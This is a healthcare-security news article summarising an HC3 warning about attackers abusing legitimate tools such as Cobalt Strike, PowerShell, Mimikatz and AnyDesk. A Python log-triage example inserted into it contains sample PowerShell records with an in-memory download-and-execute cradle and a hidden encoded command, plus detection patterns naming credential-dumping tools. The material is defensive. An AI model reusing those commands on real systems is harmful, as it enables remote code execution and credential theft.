The HIPAA Journal is the leading provider of news, updates, and independent advice for HIPAA compliance

HHS Warns HPH Sector About Abuse of Legitimate Software and Security Tools by Threat Actors

It has become increasingly common for threat actors to use living-off-the-land techniques to conduct reconnaissance, escalate privileges, establish persistence, and move laterally within networks undetected. The same software and security tools used by network administrators and red team professionals for legitimate purposes are abused to conduct attacks on victims’ infrastructure.

Threat actors leverage software tools that are already installed, which avoids the need to download files from the Internet; their malicious activity can hide in the logs alongside legitimate use of the same tools; and the tools can be used to carry out malicious actions in memory to evade security solutions. Traditional approaches to security, such as blocking the hashes of malicious files and blocking malicious domains, are ineffective against these tools because they are already present on the network.

Recently, the Health Sector Cybersecurity Coordination Center (HC3) issued a white paper warning the healthcare and public health (HPH) sector about these living-off-the-land techniques, to raise awareness of the threat and explain the risks of using certain tools. The tools most commonly abused by malicious actors include the penetration testing and adversary simulation frameworks Cobalt Strike and Brute Ratel; Microsoft’s cross-platform automation tool, PowerShell; the credential dumping application, Mimikatz; the Sysinternals suite of Windows troubleshooting utilities; and the remote desktop application, AnyDesk.

These and other tools have been extensively used by nation-state hackers and cybercriminals in attacks on a wide range of sectors, including healthcare, and mitigating the threat they pose can be a significant challenge. They all have legitimate uses and are often deployed on common systems, which makes their malicious use difficult to detect.


Cobalt Strike, for instance, has been extensively abused by threat actors for the past 5 years, with more than 8,000 attacks conducted using this comprehensive red team framework. The tool is commonly used by penetration testers to assess risks and vulnerabilities and to simulate attacks, but the extensive capabilities of the framework are ripe for abuse. Cobalt Strike can be used as a highly customizable spear phishing tool, for discovering client-side applications, for exploitation and post-exploitation activities, data transfers and real-time communications, and for command and control of compromised systems. Brute Ratel is a newer and less well-known framework with many of the same capabilities. Both tools are extensively used by ransomware gangs and nation-state threat actors, including in attacks on the healthcare sector.

PowerShell is a command shell and scripting language that IT teams use extensively for automation and configuration management, and defending against its misuse is a particular challenge. Blocking the tool outright is often impractical because of the value it provides, but where it is not commonly used, it should be disabled through group or security policies.
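Where PowerShell cannot be disabled, the HC3 paper's point that malicious activity hides in the logs alongside legitimate use means detection has to work on what was actually executed. The following is an added example, not code from the article or from HC3: it scores constructed PowerShell script block log records (the shape of Windows Event ID 4104 entries) against weighted indicators of in-memory and obfuscated execution, and tallies alerts per user so one account's anomalous use stands out against a routine baseline. Indicator weights, the threshold, usernames, hosts and addresses are all illustrative assumptions.

```python
import re
from collections import Counter

# Constructed records shaped like Windows PowerShell script block log entries
# (Event ID 4104 records the ScriptBlockText of each executed block). Not real logs.
SAMPLE_EVENTS = [
    {"user": "it-admin",   "script": "Get-Service | Where-Object Status -eq 'Stopped'"},
    {"user": "it-admin",   "script": "Invoke-WebRequest https://updates.example.test/agent.msi -OutFile C:\\Temp\\agent.msi"},
    {"user": "svc_backup", "script": "Copy-Item \\\\fs01\\backups\\*.bak D:\\staging"},
    {"user": "jsmith",     "script": "powershell -NoP -W Hidden -EncodedCommand QUJDREVGR0hJSktMTU5PUFFSU1Q="},
    {"user": "jsmith",     "script": "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"},
    {"user": "jsmith",     "script": "Get-Date"},
]

# Weighted indicators of the behaviours the article describes: code fetched over
# the network and run in memory, hidden/obfuscated execution, credential tooling.
# A single weak indicator (e.g. a plain download by an admin) does not alert.
INDICATORS = {
    "encoded_command": (2, re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    "hidden_window":   (1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    "download":        (1, re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest", re.I)),
    "in_memory_exec":  (2, re.compile(r"\bIEX\b|Invoke-Expression|\[Reflection\.Assembly\]::Load", re.I)),
    "credential_tool": (3, re.compile(r"mimikatz|sekurlsa|lsass", re.I)),
}
ALERT_THRESHOLD = 2  # illustrative; tune against the organisation's own baseline


def score_event(script):
    """Return (total weight, [matched indicator names]) for one script block."""
    hits = [name for name, (_, rx) in INDICATORS.items() if rx.search(script)]
    return sum(INDICATORS[name][0] for name in hits), hits


def triage(events, threshold=ALERT_THRESHOLD):
    """Split events into alerts and background noise and count alerts per user,
    so an account whose PowerShell use is otherwise routine becomes visible."""
    alerts, per_user = [], Counter()
    for ev in events:
        score, hits = score_event(ev["script"])
        if score >= threshold:
            alerts.append({**ev, "score": score, "indicators": hits})
            per_user[ev["user"]] += 1
    return alerts, per_user


if __name__ == "__main__":
    found, by_user = triage(SAMPLE_EVENTS)
    for a in found:
        print(f"[score {a['score']}] {a['user']}: {a['indicators']} :: {a['script'][:60]}")
    print("alerts per user:", dict(by_user))
```

Run as-is, it flags only the two jsmith blocks (encoded/hidden execution and the in-memory download cradle) while the administrator's ordinary installer download scores below the threshold.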

AnyDesk is a remote access solution that supports several operating systems and is used to provide remote IT support. It is also commonly used for file transfers and virtual private network services. Connections are encrypted to protect against data interception, but that also makes malicious use harder to detect. AnyDesk has been extensively used by ransomware actors, including AvosLocker and Babuk, and BazarLoader uses AnyDesk to deploy ransomware payloads.

HC3 says the Department of Health and Human Services neither endorses nor condemns the use of these tools, but recommends that entities in the HPH sector carefully evaluate them, weigh the risks against the rewards, and determine whether the value they provide outweighs the risks.

In the white paper, HC3 provides a detailed explanation of each of these tools, their legitimate uses, how they are abused by threat actors, and steps that can be taken to prevent and detect malicious use.

Author: Steve Alder is the editor-in-chief of HIPAA Journal. Steve is responsible for editorial policy regarding the topics covered in The HIPAA Journal. He is a specialist on healthcare industry legal and regulatory affairs, and has 10 years of experience writing about HIPAA and other related legal topics. Steve has developed a deep understanding of regulatory issues surrounding the use of information technology in the healthcare industry and has written hundreds of articles on HIPAA-related topics. Steve shapes the editorial policy of The HIPAA Journal, ensuring its comprehensive coverage of critical topics. Steve Alder is considered an authority in the healthcare industry on HIPAA. The HIPAA Journal has evolved into the leading independent authority on HIPAA under Steve’s editorial leadership. Steve manages a team of writers and is responsible for the factual and legal accuracy of all content published on The HIPAA Journal. Steve holds a Bachelor of Science degree from the University of Liverpool. You can connect with Steve via LinkedIn or email via stevealder(at)hipaajournal.com
